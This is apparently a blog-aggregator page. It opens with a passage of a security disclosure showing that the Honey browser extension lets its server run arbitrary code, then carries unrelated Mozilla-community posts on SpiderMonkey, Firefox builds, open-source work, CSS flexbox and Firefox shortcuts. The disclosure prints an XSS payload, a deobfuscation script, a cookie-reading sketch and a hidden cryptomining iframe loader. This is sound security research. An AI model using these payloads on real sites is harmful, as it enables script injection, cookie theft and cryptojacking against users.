The JavaScript code listed under pns_siteRemoveCodeAction or pns_siteSelCartCodeSubmit will be injected into the web page, so it could do anything there: add more items to the cart, change the shipping address or steal your credit card data. Honey requires us to put lots of trust into their web server, isn’t there a better way?

Turns out, Honey actually found one. Allow me to introduce a mechanism labeled as “DAC” internally for reasons I wasn’t yet able to understand:

Honey requesting the DAC script to be applied

The acorn field here contains base64-encoded JSON data. It’s the output of the acorn JavaScript parser: an Abstract Syntax Tree (AST) of some JavaScript code. When reassembled, it turns into this script:

let price = state.startPrice;
try {
    $('#coupon-code').val(code);
    $('#check-coupon').click();
    setTimeout(3000);
    price = $('#preview_total').text();
} catch (_) {
}
resolve({ price });
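Reassembling such an AST into readable source is straightforward with any ESTree-compatible code generator. Here is a hedged sketch of one way to do it in Node.js, assuming the base64 string from the acorn field is stored in acornField (this is merely one possible tooling choice, not necessarily what Honey or I used):

const escodegen = require("escodegen"); // any ESTree-compatible code generator works

// Decode the base64 payload and parse the JSON-serialized AST.
const ast = JSON.parse(Buffer.from(acornField, "base64").toString("utf8"));

// Turn the AST back into JavaScript source.
console.log(escodegen.generate(ast));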

But Honey doesn’t reassemble the script. Instead, it runs it via a JavaScript-based JavaScript interpreter. This library is explicitly meant to run untrusted code in a sandboxed environment. All one has to do is make sure that the script only gets access to safe functionality.

But you are wondering what this $() function is, aren’t you? It almost looks like jQuery, a library that I called out as a security hazard on multiple occasions. And indeed: Honey chose to expose full jQuery functionality to the sandboxed scripts, thus rendering the sandbox completely useless.

Why did they even bother with this complicated approach? Beats me. I can only imagine that they had trouble with shops using Content Security Policy (CSP) in a way that prohibited execution of arbitrary scripts. So they decided to run the scripts outside the browser where CSP couldn’t stop them.

When selectors aren’t actually selectors

So if the Honey server turned malicious, it would have to enable Honey functionality on the target website, then trick the user into clicking the button to apply promo codes? It could even make that attack more likely to succeed because some of the CSS code styling the button is conveniently served remotely, so the button could be made transparent and spanning the entire page – the user would be bound to click it.

No, that’s still too complicated. Those selectors in the store configuration, what do you think: how are these turned into actual elements? Are you saying document.querySelector()? No, guess again. Is anybody saying “jQuery”? Yes, of course it is using jQuery for extension code as well! And that means that every selector could be potentially booby-trapped.

In the store configuration pictured above, the pns_siteSelCartCodeBox field has the selector #coupon-code, [name="coupon"] as its value. What if the server replaces that selector with <img src=x onerror=alert("XSS")>? Exactly, this will happen:

An alert message saying

This message actually appears multiple times because Honey will evaluate this selector a number of times for each page. It does that for any page of a supported store, unconditionally. Remember that whether a site is a supported store or not is determined by the Honey server. So this is a very simple and reliable way for this server to leverage its privileged access to the Honey extension and run arbitrary code on any website (Universal XSS vulnerability).
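The root cause is that jQuery’s $() function accepts HTML as well as selectors: anything that looks like markup is turned into live DOM nodes. A minimal stand-alone demonstration, assuming only that jQuery is loaded on the page:

// The server-supplied "selector" is really HTML. jQuery parses it into a live
// <img> element, the bogus src fails to load, and the inline onerror handler
// fires: arbitrary code execution without even inserting anything into the page.
const selector = '<img src=x onerror=alert("XSS")>';
$(selector);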

How about some obfuscation?

Now we have simple and reliable, but isn’t it also too obvious? What if somebody monitors the extension’s network requests? Won’t they notice the odd JavaScript code?

That scenario is rather unlikely actually, e.g. if you look at how long Avast has been spying on their users with barely anybody noticing. But Honey developers are always up to a challenge. And their solution was aptly named “VIM” (no, they definitely don’t mean the editor). Here is one of the requests downloading VIM code for a store:

A request resulting in base64-encoded data in the mainVim field and more in the subVims object

This time, there is no point decoding the base64-encoded data: the result will be binary garbage. As it turns out, the data here has been encrypted using AES, with the start of the string serving as the key. But even after decrypting you won’t be any wiser: the resulting JSON data has all key names replaced by numeric indices and values are once again encrypted.

You need the following script to decrypt the data (requires CryptoJS):

// e.g. in Node.js: npm install crypto-js (drop this line if CryptoJS is already loaded)
const CryptoJS = require("crypto-js");

// Key names that the obfuscation replaces with numeric indices ("_0", "_1", …)
const keys = [
  "alternate", "argument", "arguments", "block", "body", "callee", "cases",
  "computed", "consequent", "constructor", "declaration", "declarations",
  "discriminant", "elements", "expression", "expressions", "finalizer",
  "handler", "id", "init", "key", "kind", "label", "left", "method", "name",
  "object", "operator", "param", "params", "prefix", "properties", "property",
  "quasi", "right", "shorthand", "source", "specifiers", "superClass", "tag",
  "test", "type", "update", "value"
];

function decryptValue(obj)
{
  if (Array.isArray(obj))
    return obj.map(decryptValue);
  if (typeof obj != "object" || !obj)
    return obj;

  let result = {};
  for (let key of Object.keys(obj))
  {
    let value = obj[key];
    // Obfuscated keys look like "_12": map the numeric index back to its real name.
    if (key.startsWith("_"))
      key = keys[parseInt(key.substr(1), 10)];
    // String values are AES-encrypted; the first character, a "+" and the
    // (deobfuscated) key name together form the passphrase.
    if (typeof value == "string")
      value = CryptoJS.AES.decrypt(value.slice(1), value[0] + "+" + key).toString(CryptoJS.enc.Utf8);
    else
      value = decryptValue(value);
    result[key] = value;
  }
  return result;
}

var data = "<base64 string here>";
data = JSON.parse(CryptoJS.AES.decrypt(data.slice(10), data.slice(0, 10)).toString(CryptoJS.enc.Utf8));
console.log(decryptValue(data));

What you get is once again the Abstract Syntax Tree (AST) of some JavaScript code. The lengthy chunks of JavaScript code do things like categorizing the pages of a shop and determining what kind of logic should apply to them. And the sandboxing is once again ineffective, with the code being given access to jQuery for example.

So here is a mechanism, providing the server with a simple way to run arbitrary JavaScript code on any website it likes, immediately after the page loads and with sufficient obfuscation that nobody will notice anything odd. Mission accomplished?

Taking over the extension

Almost. So far we were talking about running code in the context of websites. But wouldn’t running code in the context of the extension provide more flexibility? There is a small complication: the Content Security Policy (CSP) mechanism disallows running arbitrary JavaScript code in the extension context. At least that’s the case with the Firefox extension due to the Mozilla Add-ons requirements; on Chrome the extension simply relaxes its CSP protection.

But that’s not really a problem of course. As we’ve already established, running the code in your own JavaScript interpreter circumvents this protection. And so the Honey extension also has VIM code that will run in the context of the extension’s background page:

The extension requesting VIM code that will run in the background page

It seems that the purpose of this code is extracting user identifiers from various advertising cookies. Here is an excerpt:

var cs = {
    CONTID: {
        name: 'CONTID',
        url: 'https://www.cj.com',
        exVal: null
    },
    s_vi: {
        name: 's_vi',
        url: 'https://www.linkshare.com',
        exVal: null
    },
    _ga: {
        name: '_ga',
        url: 'https://www.rakutenadvertising.com',
        exVal: null
    },
    ...
};

The extension conveniently grants this code access to all cookies on any domain. This is only the case on Chrome, however; on Firefox the extension doesn’t request access to cookies. That’s most likely to address concerns that Mozilla Add-ons reviewers had.
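Concretely, a background script that holds the cookies permission can read identifiers like these for any domain. A hedged sketch using the standard extension API, with the cookie name and domain taken from the excerpt above (the rest is illustrative, not Honey’s actual code):

// Read the _ga cookie that the configuration above associates with an affiliate domain.
chrome.cookies.get(
  { url: "https://www.rakutenadvertising.com", name: "_ga" },
  cookie => {
    if (cookie) {
      console.log("user identifier:", cookie.value);
    }
  }
);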

The script also has access to jQuery. With the relaxed CSP protection of the Chrome version, this allows it to load any script from paypal.com and some other domains at will. These scripts will be able to do anything that the extension can do: read or change website cookies, track the user’s browsing in arbitrary ways, inject code into websites or even modify server responses.

On Firefox the fallout is more limited. So far I could only think of one rather exotic possibility: add a frame to the extension’s background page. This would allow loading an arbitrary web page that would stay around for the duration of the browsing session while being invisible. This attack could be used for cryptojacking for example.
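A hedged sketch of what that could look like, given that the background-page code has jQuery at its disposal (the URL is a made-up placeholder, not anything I observed):

// Keep an invisible page alive in the extension's background page for the
// whole browsing session, e.g. to mine cryptocurrency.
$('<iframe src="https://example.com/miner.html"></iframe>').appendTo(document.body);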

About that privacy commitment…

The Honey Privacy and Security policy states:

We will be transparent with what data we collect and how we use it to save you time and money, and you can decide if you’re good with that.

This sounds pretty good. But if I still have you here, I want to take a brief look at what this means in practice.

As the privacy policy explains, Honey collects information on availability and prices of items with your help. Opening a single Amazon product page results in numerous requests like the following:

Honey transmitting data about Amazon products to its server

The code responsible for the data sent here is only partly contained in the extension, much of it is loaded from the server:

Obfuscated VIM code returned by Honey server

Yes, this is yet another block of obfuscated VIM code. That’s definitely an unusual way to ensure transparency…

On the bright side, this particular part of Honey functionality can be disabled. That is, if you find the “off” switch. Rather counter-intuitively, this setting is part of your account settings on the Honey website:

The relevant privacy setting is labeled Community Hero

Don’t know about you, but after reading this description I would be no wiser. And if you don’t have a Honey account, it seems that there is no way for you to disable this. Either way, from what I can tell this setting won’t affect other tracking like the pns_siteSelSubId1 functionality outlined above.

On a side note, I couldn’t fail to notice one more interesting feature not mentioned in the privacy policy. Honey tracks ad blocker usage, and it will even re-run certain tracking requests from the extension if blocked by an ad blocker. So much for your privacy choices.

Why you should care

In the end, I found that the Honey browser extension gives its server very far reaching privileges, but I did not find any evidence of these privileges being misused. So is it all fine and nothing to worry about? Unfortunately, it’s not that easy.

While the browser extension’s codebase is massive and I certainly didn’t see all of it, it’s possible to make definitive statements about the extension’s behavior. Unfortunately, the same isn’t true for a web server that one can only observe from outside. The fact that I only saw non-malicious responses doesn’t mean that it will stay that way in future or that other people will have the same experience.

In fact, if the server were to invade users’ privacy or do something outright malicious, it would likely try to avoid detection. One common way is to only do it for accounts that accumulated a certain amount of history. As security researchers like me usually use fairly new accounts, they won’t notice anything. Also, the server might decide to limit such functionality to countries where litigation is less likely. So somebody like me living in Europe with its strict privacy laws won’t see anything, whereas US citizens would have all of their data extracted.

But let’s say that we really trust Honey Science LLC given its great track record. We even trust PayPal who happened to acquire Honey this year. Maybe they really only want to do the right thing, by any means possible. Even then there are still at least two scenarios for you to worry about.

The Honey server infrastructure makes an extremely lucrative target for hackers. Whoever manages to gain control of it will gain control of the browsing experience for all Honey users. They will be able to extract valuable data like credit card numbers, impersonate users (e.g. to commit ad fraud), take over users’ accounts (e.g. to demand ransom) and more. Now think again how much you trust Honey to keep hackers out.

But even if Honey had perfect security, they are also a US-based company. And that means that at any time a three letter agency can ask them for access, and they will have to grant it. That agency might be interested in a particular user, and Honey provides the perfect infrastructure for a targeted attack. Or the agency might want data from all users, something that they are also known to do occasionally. Honey can deliver that as well.

And that’s the reason why Mozilla’s Add-on Policies list the following requirement:

Add-ons must be self-contained and not load remote code for execution

So it’s very surprising that the Honey browser extension in its current form is not merely allowed on Mozilla Add-ons but also marked as “Verified.” I wonder what kind of review process this extension went through that none of the remote code execution mechanisms were detected.

Edit (2020-10-28): As Hubert Figuière pointed out, extensions acquire this “Verified” badge by paying for the review. All the more interesting to learn what kind of review has been paid here.

While Chrome Web Store is more relaxed on this front, their Developer Program Policies also list the following requirement:

Developers must not obfuscate code or conceal functionality of their extension. This also applies to any external code or resource fetched by the extension package.

I’d say that the VIM mechanism clearly violates that requirement as well. As I have yet to discover a working mechanism for reporting violations of Chrome’s Developer Program Policies, it remains to be seen whether this will have any consequences.

Patrick Clokedjango-render-block 0.8 (and 0.8.1) released!

A couple of weeks ago I released version 0.8 of django-render-block, this was followed up with a 0.8.1 to fix a regression.

django-render-block is a small library that allows you to render a specific block from a Django (or Jinja) template; this is frequently used for emails when …

Spidermonkey Development BlogSpiderMonkey Newsletter 7 (Firefox 82-83)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 82 and 83 Nightly release cycles.

If you like these newsletters, you may also enjoy Yulia’s Compiler Compiler live stream.

🏆 New contributors

  • Yozaam optimized part of our private fields implementation.

👷🏽‍♀️ New features

Firefox 82-83

  • Adam added Reflect[Symbol.toStringTag] and Jeff added Intl[Symbol.toStringTag].

In progress

🚀 WarpBuilder

WarpBuilder is the JIT project to replace the frontend of our optimizing JIT (IonBuilder) and the engine’s Type Inference mechanism with a new MIR builder based on compiling CacheIR to MIR. WarpBuilder will let us improve security, performance, memory usage and maintainability of the whole engine.

We have enabled WarpBuilder by default for Firefox 83 🎉 This resulted in improved responsiveness, page load performance and memory usage. Feedback from Nightly users has been very positive.

A few of the other Warp changes that landed in the past months:

🧹 Garbage Collection

  • Jon added a header to dynamic object slots to store the object slot span and capacity.
  • Jon refactored the tracing interface and simplified how slots and elements are stored on the mark stack. These changes will help us experiment with concurrent marking.
  • Jon optimized the GC barrier code.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • Kannan landed the ParserAtom conversion. The frontend no longer depends on the GC to allocate atoms.
  • Ted landed various follow-up optimizations for ParserAtoms.
  • Arai added a browser pref that switches off-thread parsing to use the Stencil format instead of off-thread GC allocations.
  • Kannan added support for serializing the Stencil format to XDR.
  • Arai added support for incremental XDR-encoding.
  • Denis added telemetry probes for JS parsing and execution.
  • Arai updated the Stencil data structures to support moving between threads.
  • Arai cleaned up the interaction of Stencil with delazification.
  • Matthew simplified handling of BigInt properties in the frontend.
  • Ted updated Debugger to compile less when inserting breakpoints.

⚡ WebAssembly

  • Benjamin enabled Cranelift by default for ARM64 hardware in Nightly builds.
  • Lars added support for SIMD instructions on ARM64 to the baseline compiler.
  • Dmitry from Igalia landed more call ABI changes for speeding up indirect calls.

📚 Miscellaneous changes

  • Jason optimized lexical variables in generators and async functions.
  • Tom Ritter added a disnative shell function for disassembling JIT/Wasm code.
  • Nicolas changed the callWithABI interface. This lets us generate ABI tests for each signature.
  • Steve made jsapi-tests faster by letting tests reuse a JS context/global.
  • Iain added a jitsrc command for rr to help debug JIT code.
  • Jeff started splitting up jsfriendapi.h into smaller headers.
  • Jon and André cleaned up many headers, removing a lot of unnecessary #includes.
  • Arai added documentation explaining how async functions and async generators are implemented.
  • Jan and Ryan removed a lot of code for TypedObject. This feature has been non-standard and Nightly-only for years, but the underlying code is now being reused for Wasm GC support.
  • Jon simplified locking for helper thread tasks.
  • Iain cleaned up the bailout code in the Ion backend.
  • Denis made canceling off-thread parse tasks more robust.

The Talospace ProjectFirefox 82 on POWER goes PGO

You'll have noticed this post is rather tardy, since Firefox 82 has been out for the better part of a week, but I wanted to really drill down on a couple variables in our Firefox build configuration for OpenPOWER and also see if it was time to blow away a few persistent assumptions.

But let's not bury the lede here: after several days of screaming, ranting and scaring the cat with various failures, this blog post is finally being typed in a fully profile-guided and link-time optimized Firefox 82 tuned for POWER9 little-endian. Although it multiplies compile time by nearly a factor of 3 and the build process intermittently can consume a terrifying amount of memory, the PGO-LTO build is roughly 25% faster than the LTO-only build, which was already 4% faster than the "baseline" -O3 -mcpu=power9 build. That's worth an 84-minute coffee break! (-j24 on a dual-8 Talos II [64 threads], 64GB RAM.)

The problem with PGO and gcc (at least gcc 10, anyway) is that all the .gcda files end up in the same directory as the built objects in an instrumented build. The build system, which is now heavily clang-centric (despite the docs, gcc is clearly Tier 2, since this and other things don't work), does not know how to handle or transfer the resulting profile data and bombs after running the test load. We don't build with clang because in previous attempts it never managed to fully build the browser on ppc64le and I'm sceptical of its code quality on this platform anyway, but since I wanted to verify against a presumably working configuration I did try a clang build first to see if anything had changed. It breaks fairly early now, interestingly while compiling a Rust component:

4:33.00 error: /home/censored/src/mozilla-release/obj-powerpc64le-unknown-linux-gnu/release/deps/libproc_macro_hack-b7d125d9ae0afae7.so: undefined symbol: __muloti4
4:33.00 --> /home/censored/src/mozilla-release/third_party/rust/phf_macros/src/lib.rs:227:5
4:33.00 227 | #[::proc_macro_hack::proc_macro_hack]
4:33.00    |      ^^^^^^^^^^^^^^^
4:33.00 error: aborting due to previous error
4:33.00 error: could not compile `phf_macros`.

So there's that. I'm not very proficient in Rust so I didn't do much more diagnosis at this point. Back to the hippo gcc.

What's needed is to hack the build system to copy the .gcda files generated during profiling out of instrumented/ into the regular build tree for the actual (second) build phase, which is essentially the solution proposed in bug 1601903 except without any explanation as to how you actually do it. The PGO driver is fortunately in a standalone Python script, so I decided to simply hijack that. At the end is code to coalesce the .profraw files from a successful instrumented clang build, which shouldn't be running anyway if the compiler is gcc, so I threw in a couple lines to terminate instead after it runs this shell script:

#!/bin/csh -f

set where=/tmp/mozgcda.tar

# all on one line yo
cd /home/censored/src/mozilla-release/obj-powerpc64le-unknown-linux-gnu/instrumented || exit
tar cvf $where `find . -name '*.gcda' -print`
cd ..
tar xvf $where
rm -f $where

This repopulates the .gcda files in the right place before we rebuild with the profile data, but because of this subterfuge, gcc thinks the generated profile is not consistent with the source and spams an incredible amount of complaint messages ... which made it difficult to spot the internal compiler error that the profile-guided rebuild triggered. This required another rebuild with some tweaks to turn that off and some other irrelevant warnings (I'll probably upstream at least one of these changes) so I could determine where the ICE was in the scrollback. Fortunately, it was in a test binary, so I just commented it out in the moz.build and it finally stuck. And so far, it's working impressively well. This may well be the fastest the browser can get while still lacking a JIT.

After all that, it's almost an anticlimax to mention that --disable-release is no longer needed in the build configs. You can put it in the Debug configuration if you want, but I now use --enable-release in optimized builds and it seems to work fine.

If you want to try compiling a PGO-LTO build yourself, here is a gist with the changes I made (they are all trivial). Save the shell script above as gccpgostub.csh in ~/src/mozilla-release and/or adjust paths as necessary, and make sure it is chmodded +x. Yes, there is no doubt a more elegant way to do this in Python itself but I hate Python and I was just trying to get it to work. Note that PGO builds can be exceptionally toolchain-dependent (and ICEs more so); while TestUtf8 was what triggered the ICE on my system (Fedora 32, gcc 10.2.1), it is entirely possible it will halt somewhere else in yours, and the PGO command line options may not work the same in earlier versions of the compiler.

Without further ado, the current .mozconfigs, starting with Optimized. Add ac_add_options MOZ_PGO=1 to enable PGO once you have patched your tree and deposited the script.

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24"
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-O3 -mcpu=power9"
ac_add_options --enable-release
ac_add_options --enable-linker=bfd
ac_add_options --enable-lto=full

# this is implied by enable-release but left in to be explicit
export RUSTC_OPT_LEVEL=2

Debug

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24"
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-Og -mcpu=power9"
ac_add_options --enable-debug
ac_add_options --enable-linker=bfd

export RUSTC_OPT_LEVEL=0

David Telleryoric.steps.next()

The web is getting darker. It is being weaponized by trolls, bullies and bad actors and, as we’ve witnessed, this can have extremely grave consequences for individuals, groups, sometimes entire countries. So far, most of the counter-measures proposed by either governments or private actors are even scarier.

The creators of the Matrix protocol have recently published the most promising plan I have seen. One that I believe stands a chance of making real headway in this fight, while respecting openness, decentralization, open-source and privacy.

I have been offered the opportunity to work on this plan. For this reason, after 9 years as an employee at Mozilla, I’ll be moving to Element, where I’ll try and contribute to making the web a better place. My last day at Mozilla will be October 30th.

Daniel StenbergWorking open source

I work full time on open source and this is how.

Background

I started learning how to program in my teens, well over thirty years ago and I’ve worked as a software engineer and developer since the early 1990s. My first employment as a developer was in 1993. I’ve since worked for and with lots of companies and I’ve worked on a huge amount of (proprietary) software products and devices over many years. Meaning: I certainly didn’t start my life open source. I had to earn it.

When I was 20 years old I did my (then mandatory) military service in Sweden. After having endured that, I applied to the university while at the same time I was offered a job at IBM. I hesitated, but took the job. I figured I could always go to university later – but life took other turns and I never did. I didn’t do a single day of university. I haven’t regretted it.

I learned to code in the mid 80s on a Commodore 64 and software development has been one of my primary hobbies ever since. One thing it taught me well, that I still carry with me, is to spend a few hours per day in front of my home computer.

And then I shipped curl

In the spring of 1998 I renamed my little pet project of the time again and I released the first ever curl release. I have told this story many times, but since then I have spent two hours or so of my spare time on that project – every day for over twenty years. While still working as a software engineer by day.

Over time, curl gradually grew popular and attracted more users. There was no sudden moment in time where I struck gold and everything took off. It was just slowly gaining ground while me and my fellow project members kept improving and polishing curl. At some point in time I happened to notice that curl and libcurl would appear in more and more acknowledgements and in open source license collections in products and devices.

It was still just a spare time project.

Proprietary Software for years

I’d like to emphasize that I worked as a contract and consultant developer for many years (over 20!), primarily on proprietary software and custom solutions, before I managed to land myself a position where I could primarily write open source as part of my job.

Mozilla

In 2014 I joined Mozilla and got the opportunity to work on the open source project Firefox for a living – and doing it entirely from my home. This was the first time in my career I actually spent most of my days on code that was made public and available to the world. They even allowed me to spend a part of my work hours on curl, even if that didn’t really help them and curl was not a fundamental part of any Mozilla work or products. It was still great.

I landed that job for Mozilla a lot thanks to my many years and long experience with portable network coding and running a successful open source project at this level.

My work setup with Mozilla made it possible for me to spend even more time on curl, apart from the (still going) two daily spare time hours. Nobody at Mozilla cared much about (my work with) curl and no one there even asked me about it. I worked on Firefox for a living.

For anyone wanting to do open source as part of their work, getting a job at a company that already does a lot of open source is probably the best path forward. Even if that might not be easy either, and it might also mean that you would have to accept working on some open source projects that you might not yourself be completely sold on.

In late 2018 I quit Mozilla, in part because I wanted to try to work with curl “for real” (and part other reasons that I’ll leave out here). curl was then already over twenty years old and was used more than ever before.

wolfSSL

I now work for wolfSSL. We sell curl support and related services to companies. Companies pay wolfSSL, wolfSSL pays me a salary and I get food on the table. This works as long as we can convince enough companies that this is a good idea.

The vast majority of curl users out there of course don’t pay anything and will never pay anything. We just need a small number of companies to do it – and it seems to be working. We help customers use curl better, we make curl better for them and we make them ship better products this way. It’s a win win. And I can work on open source all day long thanks to this.

My open source life-style

A normal day in the work week, I get up before 7 in the morning and I have breakfast with my family members: my wife and my two kids. Then I grab my first cup of coffee for the day and take the thirteen steps up the stairs to my “office”.

I sit down in front of my main development (Linux) machine with two 27″ screens and get to work.

<figcaption>Photo of my work desk from a few years ago but it looks very similar still today.</figcaption>

What work and in what order?

I lead the curl project. It means many questions and decisions fall down to me to have an opinion about or say on, and it’s a priority for me to make sure that I unblock such situations as soon as possible so that developers wanting to do things with curl can continue doing that.

Thus, I read and respond to email about curl all hours I’m awake and have network access. Of course incoming messages actually rarely require immediate responses and then I can queue them up and instead do them later. I also try to read and assess all new incoming curl issues as soon as possible to see if there’s something urgent I should deal with immediately, or otherwise figure out how to deal with them going forward.

I usually have a set of bugs or features to work on so when there’s no alarming email or GitHub issue left, I context-switch over to the curl source code tree and the particular branch I’m working on right now. I typically have 20-30 different branches of development at various stages of maturity going on. If I get stuck on something, or if I create a pull-request for one of them that needs time to get all the CI jobs done, I switch over to one of the others.

Customers and their needs of course have priority when I decide what to work on. The exception would perhaps be security vulnerabilities or other really serious bugs being reported, but thankfully they are rare. But after that, I go by ear and work on what I think is fun and what I think users might appreciate.

If I want to go forward with something, for my own sake or for a customer’s, and that entails touching or improving other software in other projects, then I don’t shy away from submitting pull requests for them – or at least filing an issue.

Spare time open source

Yes, I still spend my spare time hours on open source, mostly curl. This means I often end up spending 50-55 hours per week on curl and curl related activities. But I don’t count or measure work hours and I rarely have to report any to anyone. This is a work of love.

Lots of people will say that they don’t have time because of life, family, kids etc. I have of course been very fortunate over the years to have had the opportunity and ability to spend all this time on what I want to do, but let’s not forget that people in general spend lots of time on their hobbies; on watching TV, on playing computer games and on socializing with friends and why not: to sleep. If you cut down on all of those things (yes, including the sleeping) there could very well be opportunities. It’s often a question of priorities. I’ve made spare time development a priority in my life.

curl support?

Any company that uses curl or libcurl – and they are plenty – could benefit from buying support from us instead of wasting their own time and resources. We at wolfSSL are probably much better at curl already and we can find and fix the issues much faster, which ends up cheaper and better long-term.

Credits

The top photo is taken by Anja Stenberg, my wife. It’s me in a local forest, summer 2020.

Tiger OakesGoing from Android LinearLayout to CSS flexbox

Are you an Android developer looking to learn web development? I find it easier to learn a new technology stack by comparing it to a stack I’m already familiar with. Android developers can layout views using the simple yet flexible LinearLayout class. The web platform has similar tools to layout elements using CSS, and some concepts are shared. Here’s some tips to learn web development using your Android knowledge.

Let’s focus on a horizontal layout, similar to a LinearLayout with the "horizontal" orientation. The layout in Android may look something like this:

<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    id="@+id/horizontal"
    android:layout_width="200dp"
    android:layout_height="100dp"
    android:orientation="horizontal"
    android:gravity="center_vertical|center_horizontal">

  <TextView
    id="@+id/child1"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:layout_weight="1"
    android:background="#bcf5b1"
    android:text="One" />

  <TextView
    id="@+id/child2"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:layout_gravity="top"
    android:background="#aacaff"
    android:text="Two" />

  <TextView
    id="@+id/child3"
    android:layout_width="wrap_content"
    android:layout_height="wrap_content"
    android:background="#e3e2ad"
    android:text="Three" />

</LinearLayout>
One Two Three

On the web, layouts are split across two languages: HTML for declaring elements (similar to XML files in Android declaring views) and CSS for declaring styling (similar to the styles.xml file).

<div id="horizontal">
  <span id="child1">One</span>
  <span id="child2">Two</span>
  <span id="child3">Three</span>
</div>
#horizontal {
  width: 200px;
  height: 100px;
  display: flex;
  flex-direction: row;
  justify-content: center;
  align-items: center;
}

#child1 {
  background: #bcf5b1;
  flex-grow: 1;
}

#child2 {
  background: #aacaff;
  align-self: flex-start;
}

#child3 {
  background: #e3e2ad;
}

These files look somewhat similar to the Android XML, except that most attributes have been moved to CSS and have different names. CSS allows you to specify blocks of rules. Rules have a selector to indicate which element the styles are applied to, with the # character corresponding to an ID. Inside the rules are various declarations: pairs of properties and values.

Let’s break down some of these properties and how they correspond to Android’s LinearLayout.

width and height

The CSS width and height properties correspond to android:layout_width and android:layout_height. The pixel unit (px) is used in place of density independent pixels (dp). CSS pixels correspond 1:1 with density independent pixels, and do not necessarily correspond to the actual number of pixels an element takes up on a device.

Inline text elements like span default to wrapping their content, so we don’t need to set an explicit width and height.

display: flex

The display property sets the layout used for an element’s children. It’s used in place of the LinearLayout tag to specify the layout system. Having this information in CSS instead of the HTML/XML allows web developers to change the layout system in response to screen size or other factors.

The flex display value, also known as Flexbox layout, corresponds roughly with LinearLayout, and I’ll focus on it in this post.

flex-direction

flex-direction lets you set the layout direction, just like the android:orientation attribute. Rather than "horizontal" and "vertical", you can set the value to be row or column. Just as LinearLayout defaults to horizontal orientation, flexbox direction defaults to row.

justify-content and align-items

In Android, the gravity for a view can be set on both axes in a single attribute. center_vertical and center_horizontal can be used at the same time, or even combined into the shorthand android:gravity="center".

CSS breaks up the attribute into two different properties, depending on the axis. These properties are relative to the flex-direction rather than the absolute direction, so “top” will be different between horizontal and vertical content.

justify-content sets the alignment of items in the direction of the flexbox. When flex-direction is set to row, justify-content affects the horizontal layout. Using the value center corresponds with android:gravity="center_horizontal".

align-items sets the alignment of items perpendicular to the direction of the flexbox. When flex-direction is set to row, align-items affects the vertical layout. Using the value center corresponds with android:gravity="center_vertical".

flex-grow

Children of a LinearLayout can have a layout_weight assigned to them, allowing the child to be stretched. Available space will be distributed among children based on their weight values, which default to 0. CSS flexbox has the equivalent flex-grow property, which has the exact same behavior.

align-self

The alignment of a single item in a flexbox can be overridden using the align-self property. This corresponds with android:layout_gravity. Like align-items, the values are perpendicular to the flex-direction instead of absolute directions. When flex-direction is set to row, flex-start represents the top of the container. Similarly, flex-end represents the bottom of the container.

Flexbox layout is capable of much more than LinearLayout, and it’s a commonly used tool in web development. If you’re looking to work on some CSS, or if you’re a web developer reading this post in reverse, I hope this comparison helped you!

Mike HoyeNavigational Instruments

A decade ago I got to sit in on a talk by one of the designers of Microsoft Office who’d worked on the transition to the new Ribbon user interface. There was a lot to learn there, but the most interesting thing was when he explained the core rationale for the redesign: of the top ten new feature requests for Office, every year, six to eight of them were already features built into the product, and had been for at least one previous version. They’d already built all this stuff people kept saying they wanted, and nobody could find it to use it.

It comes up periodically at my job that we have the same problem; there are so many useful features in Firefox that approximately nobody knows about, even people who’ve been using the browser every day and soaking in the codebase for years. People who work here still find themselves saying “wait, you can do that?” when a colleague shows them some novel feature or way to get around the browser that hasn’t seen a lot of daylight.

In the hopes of putting this particular peeve to bed, I did a casual survey the other day of people’s favorite examples of underknown or underappreciated features in the product, and I’ve collected a bunch of them here. These aren’t Add-ons, as great as they are; this is what you get from Firefox out of the proverbial box. I’m going to say “Alt” and “Ctrl” a lot here, because I live in PC land, but if you’re on a Mac those are “Option” and “Command” respectively.

Starting at the top, one of the biggest differences between Firefox and basically everything else out there is right there at the top of the window, the address bar that we call the Quantumbar.

Most of the chromium-client-state browsers seem to be working hard to nerf out the address bar, and URLs in general. It’s my own paranoia, maybe, but I suspect the ultimate goal here is to make it easier to hide how much of that sweet, sweet behavioral data this will help companies siphon up unsupervised. Hoarding the right to look over your shoulder forever seems to be the name of the game in that space, and I’ve got a set of feelings about that you might be able to infer from this paragraph. It’s true that there’s a lot of implementation detail being exposed there, and it’s true that most people might not care so why show it, but being able to see into the guts of a process so you can understand and trust it is just about the whole point of the open-source exercise. Shoving that already-tiny porthole all the way back into the bowels of the raw codebase – particularly when the people doing the shoving have entire identities, careers and employers none of which would exist at all if they hadn’t leveraged the privileges of open software for themselves – is galling to watch, very obviously a selfish, bad-faith exercise. It reduces clicking a mouse around the Web to little more than clicking a TV remote, what Douglas Adams used to call the “point and grunt interface”.

Fortunately the spirit of the command line, in all its esoteric and hidden power, lives on in a few places in Firefox. Most notably in a rich set of Quantumbar shortcuts you can use to get around your browser state and history:

  • Start typing your search with ^ to show only matches in your browsing history.
  • * to show only matches in your bookmarks.
  • + to show only matches in bookmarks you’ve tagged.
  • % to show only matches in your currently open tabs.
  • # to show only matches where every search term is part of the title or part of a tag.
  • $ to show only matches where every search term is part of the web address (URL). The text “https://” or “http://” in the URL is ignored but not “file:///”.
  • Add ? to show only search suggestions.
  • Hitting Ctrl-Enter in the URL bar works like autocomplete: type “mozilla” and Ctrl-Enter takes you straight to www.mozilla.com, for example. Shift-Enter will open a URL in a new tab.

Speaking of the Quantumbar, you can customize it by right-clicking any of the options in the three-dot “Page Options” pulldown menu, and adding them to the address bar. The screenshot tool is pretty great, but one of my personal favorites in that pile is Reader Mode. Did you know there’s text-to-speech built into Reader Mode? It surprised me, too. Click those headphones, see how it goes.

